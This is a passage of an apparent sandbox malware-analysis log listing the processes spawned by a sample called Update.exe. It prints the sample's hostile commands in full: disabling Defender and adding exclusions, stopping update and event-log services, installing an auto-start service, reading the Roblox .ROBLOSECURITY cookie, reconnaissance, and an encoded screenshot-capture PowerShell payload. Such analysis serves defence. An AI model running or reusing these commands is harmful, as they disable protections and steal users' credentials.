AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8576.tmp" "c:\Users\user\AppData\Local\Temp\yidhhzbx\CSCA27ED749AA364CCD94BFD566BA81531.TMP"
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "JLDYOGXF"
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "JLDYOGXF" binpath= "C:\ProgramData\bmqxekewprir\nfblozsybbjy.exe" start= "auto"
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "JLDYOGXF"
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exe C:\ProgramData\bmqxekewprir\nfblozsybbjy.exe
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeProcess created: C:\Windows\explorer.exe explorer.exe
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI68522\rar.exe a -r -hp"dextycraxscloud" "C:\Users\user\AppData\Local\Temp\dRGk3.zip" *"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Users\user\Desktop\Update.exe "C:\Users\user\Desktop\Update.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe'"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "start bound.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI68522\rar.exe a -r -hp"dextycraxscloud" "C:\Users\user\AppData\Local\Temp\dRGk3.zip" *"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe'Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Users\user\AppData\Local\Temp\Build.exe "C:\Users\user\AppData\Local\Temp\Build.exe"
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exe "C:\Users\user\AppData\Local\Temp\lf6o4T3T.exe"
